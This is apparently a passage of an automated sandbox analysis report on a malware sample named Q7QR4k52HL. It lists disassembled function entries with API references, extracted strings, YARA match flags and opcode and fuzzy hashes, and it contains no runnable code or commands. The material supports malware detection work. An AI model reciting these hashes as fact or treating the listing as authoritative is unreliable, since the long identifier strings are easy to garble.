Instruction Fuzzy Hash: E2F09C345145948BDB918F3C9C996BE67F0F753314F302BB5CA5AE32A2C631C8918F09

Function 0044042D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 0044049C
7&'$, xrefs: 00440445

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: 6a4960e2c4cbeac596ca4eae9f8a78f72d17191a97ba87abbbd4385de96e26bd
Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
Opcode Fuzzy Hash: 6a4960e2c4cbeac596ca4eae9f8a78f72d17191a97ba87abbbd4385de96e26bd
Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C

Function 0041194F Relevance: 2.2, APIs: 1, Instructions: 666COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00411D64

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
Instruction ID: a8cfc5bf14821c73dd49e5f1522f5c4ec20a02328b59693b871348f0b0df5eb8
Opcode Fuzzy Hash: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
Instruction Fuzzy Hash: E4420A71A04B408FD714DF38D9813A6BBE1AF95314F188A3ED5EB8B3D2D639A446C706

Function 0043CD27 Relevance: 2.0, Strings: 1, Instructions: 747COMMON

Download Yara Rule

Strings

/p, xrefs: 0043D2AD

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: /p
API String ID: 0-62938030
Opcode ID: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
Instruction ID: ba8b9978e2f20e60afdbbdaba48a15688935c3ff76d45a9363d37c1b9ca99bef
Opcode Fuzzy Hash: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
Instruction Fuzzy Hash: 7C32003AA18351CBD7049F39D81226BB7E1FF9A320F19887ED8C183291E779C955C786

Function 00827AE4 Relevance: 1.8, APIs: 1, Instructions: 334COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00827E61

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction ID: 8d4bf5f1827e29a812b12e6895f6f2db9431825357197eb4016b130920622c20
Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction Fuzzy Hash: E0B113769083218BC314CF29C4917AAB7F2FFD9314F19962CE8C59B254E7389D42C796

Function 00827FFA Relevance: 1.8, APIs: 1, Instructions: 263COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 008282CF

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
Instruction ID: ac9a6495b5007c09f14105e740bb5c5b58a7f30e85a1091b56c77d590623ec10
Opcode Fuzzy Hash: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
Instruction Fuzzy Hash: 8391F171509321CBCB24CF28C89166BB7E1FFC8314F098A5DE4C98B254EB389941CB46

Function 00847DD0 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 00847EF7

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction ID: 8186be4eb16929fe1794acd8fe6009b40f9bb8bdacfd77bc92b5e7bba140a503
Opcode Fuzzy Hash: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
Instruction Fuzzy Hash: DA91C3B1E042548FCB08CF6CC89169EBBF2BF89310F2982ADD855AB391D7759C05CB91

Function 00437B69 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 00437C90

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 780105dc1da381acd2e1fd75bdd8727f1b567061e4b7cebbe5fd1d4054a1ec99
Instruction ID: c3200330e68ce6aff19a63fed1a4000c560c1f69ed3aeb6105e6dfa3e47a6751
Opcode Fuzzy Hash: 780105dc1da381acd2e1fd75bdd8727f1b567061e4b7cebbe5fd1d4054a1ec99
Instruction Fuzzy Hash: 9C91C3B1E042548FCB18CF6CC89179EBBF2AF89310F2982ADD855AB391D7759C01CB91

Function 0084268D Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

J, xrefs: 00842706

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction ID: 326f5b0e4d2c021587780162f725b8c03d4e164064efb000085bca59af90cf80
Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
Instruction Fuzzy Hash: CC127C75609AC18FE3158B38C891392BFE1AB66304F1CC9ADD4EACB387D63AD506C751

Function 00432426 Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

J, xrefs: 0043249F

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: ead4b78866dd6fa033d6287702ef173ed587bb7cc98ce8c0654f759011b0a58d
Instruction ID: fda16036ad69fd6001319f3414ba3134900024cf57a0a68240a2308677c6b07d
Opcode Fuzzy Hash: ead4b78866dd6fa033d6287702ef173ed587bb7cc98ce8c0654f759011b0a58d
Instruction Fuzzy Hash: 82127D71609AC18FE3158B38C591392BFE1AB66304F1CC9AEC4EACB387D63AD5068755

Function 00847712 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 00847832

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction ID: effef9fd280956e6aeb4fe1bce0f0d0c2a6d286662b6d999cddabcad33ead307
Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
Instruction Fuzzy Hash: 3371C3B1E046508FC718CF6CC85535ABFE2AF86314F2982ADD8999B3D2D7759C06CB81

Function 004374AB Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 004375CB

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: Object
String ID:
API String ID: 2936123098-0
Opcode ID: 39bfddd0d89d5aa851c5ebc283ebdd57ba84922f60a181c47f450d59d7061f13
Instruction ID: 45239876aaa66c970168bcac432cbab02119562676560ecae2c3189c67bbcca7
Opcode Fuzzy Hash: 39bfddd0d89d5aa851c5ebc283ebdd57ba84922f60a181c47f450d59d7061f13
Instruction Fuzzy Hash: 6571C7B1E046508FC718CF6CC851359BFF2AB99314F2982ADD8999F3D2D6759C06CB81

Function 00845F7A Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00846020

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction ID: 622380088dd2fddaf91ee47266824161f5d0d32dfb7200104ac03d765c9c7c6b
Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
Instruction Fuzzy Hash: 0A912A11208BC28ED7268B3C88586157F915B67228B2D87DCE0FA8F7E7D657C107C366

Function 00435D13 Relevance: 1.7, APIs: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00435DB9

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: aee65baa84eec6bad4cf93c4ab93b2d334002cbc985cabf08a2e562f31577c33
Instruction ID: f2a30e19a756ef2febaf58aa14edd62971e43cb539abc4116fa3d4166735a6c9
Opcode Fuzzy Hash: aee65baa84eec6bad4cf93c4ab93b2d334002cbc985cabf08a2e562f31577c33
Instruction Fuzzy Hash: 51913A21208BC28ED3268B3C88486157F915B67228F2C87DCE0FA8F7E7C6568107C366

Function 008446A4 Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00844748

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction ID: 84c992021679ccd5a68d452c1351f01e88124265a3d4e3b684032d1e1e383a78
Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
Instruction Fuzzy Hash: 5F913C11208BC28ED326CA3C88586557F925B67228B2D87DCD0FA8F7D7C7668507C766

Function 0043443D Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004344E1

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c3b337a8243762e24d3398e04d6e3e2f6a45ffd33d07df9af46c71bdbb35dbce
Instruction ID: 615ca32909d59e4e98a0e547278d02967b49bf7f3b148c397c41720c4b96474d
Opcode Fuzzy Hash: c3b337a8243762e24d3398e04d6e3e2f6a45ffd33d07df9af46c71bdbb35dbce
Instruction Fuzzy Hash: EB912C11208BC28EC326CA3C88586557F921BA7228F2D87DDD0FA8F7D7C7669507C766

Function 008325E7 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 00832613

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: :;
API String ID: 0-3581617570
Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction ID: 3d0be3bcbb8e744033a6f3338fa6bfbb5c4d9200e301a0769e66af812ace3fa5
Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction Fuzzy Hash: FEA1F371A053109BD711AF28CC82BABB7E5FFD1324F188528E895CB281E379ED458792

Function 00422380 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 004223AC

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: :;
API String ID: 0-3581617570
Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A

Function 0084C807 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0084CA27

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction ID: 0ad4300a6cb7ff9c8e6663059d02aa8aaaaeda81364f5163bc3696e928afd8ef
Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction Fuzzy Hash: 67A14971B05328ABD764CF29C8C2B3BB7AAFBC5724F18862CE994D7291D7319C018795

Function 0043C5A0 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043C7C0

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799

Function 0082C148 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0082C5C7, 0082C5CB

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction ID: 8ec2ff1766c02836c7024503e9634806dd4bad5f594b338c0bfd9bbd0a79bf5f
Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction Fuzzy Hash: FD91FFA15183208BC3148F28D89167FB7E2FFD1364F189A2CE8D58B790E774D985C796

Function 0041BEE1 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0041C360, 0041C364

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A

Function 00416ED0 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

*+, xrefs: 00417069

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: *+
API String ID: 0-2181965719
Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A

Function 008526D7 Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

_\]R, xrefs: 008526F7

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: _\]R
API String ID: 0-1576797437
Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction ID: 67ca5fe076dc4db048008c879e8f8d0f87823d1d2efd3cc5bf5d628bd345f164
Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction Fuzzy Hash: A791F5316083519BCB18DF288850A6FB7E2FFDA325F19856CE8C597391EB319819C786

Function 00442470 Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

_\]R, xrefs: 00442490

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: InitializeThunk
String ID: _\]R
API String ID: 2994545307-1576797437
Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A

Function 00838197 Relevance: 1.5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

Strings

, xrefs: 008382DB, 008382FA, 0083832B

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
Instruction ID: 483c371af4f16a1eeb502152f634f913e5c5e8867eb73de9a6445e4ebd289cd6
Opcode Fuzzy Hash: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
Instruction Fuzzy Hash: 608116B1A08711DBD7149B688C92B6FB2A6FFC1724F18862CF895C7381EB359C0587D6

Function 00843B97 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

d, xrefs: 00843C31

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction ID: 8f2f53ad5f901e315eec5ae0a9a48ac215affe55cfb8a4ae7f88335f9b1fd852
Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction Fuzzy Hash: 8F814836759A984BD7289A3C4C6127A7A938BD3230F2DC77DB5F6CB3E1D55889058340

Function 00433930 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

d, xrefs: 004339CA

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction ID: ef403fb1259512c9711d70f2e7d5f4cfd006a755ed026aeb3bab0d0ce1423d2c
Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
Instruction Fuzzy Hash: 49816827759AD04BD7289E3C4C6127ABE830BD6230F2DD77EB5F68B3E2D56889018345

Function 0083DA97 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0083DC95

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 9044512341c7c18d5e9af5ddfc0a160349240c4c2c997784d580c061a666e835
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 2071B232A083599BD724CE28E88031EB7E2FBC5724F29C52DE494DB395D6749D45C7C2

Function 0042D830 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042DA2E

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A

Function 0081D253 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

FF468920BFFA1172D0632DF0E28DC412, xrefs: 0081D3D2

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: FF468920BFFA1172D0632DF0E28DC412
API String ID: 0-2657772603
Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction ID: 9898686e921e4e9b8729abca82e910e08ab42a05dfc4f9a30e2ebbd6561e3095
Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction Fuzzy Hash: 85516B72605B408FD729CF38CC826967BA3EFD6310B1D866CC5964B796DB35A406C750

Function 0082AB67 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_;=8, xrefs: 0082ACBF

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: _;=8
API String ID: 0-3640539833
Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
Instruction ID: e65f61191cac0756f40bcf97e422ab3e604fe2f998f2c822712dea1ad47db9b7
Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
Instruction Fuzzy Hash: 245111B0511B508BC7389F25C8616B3BBF1FF52345B084E6DC4C38BA45E739A949CB61

Function 0041A900 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_;=8, xrefs: 0041AA58

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: _;=8
API String ID: 0-3640539833
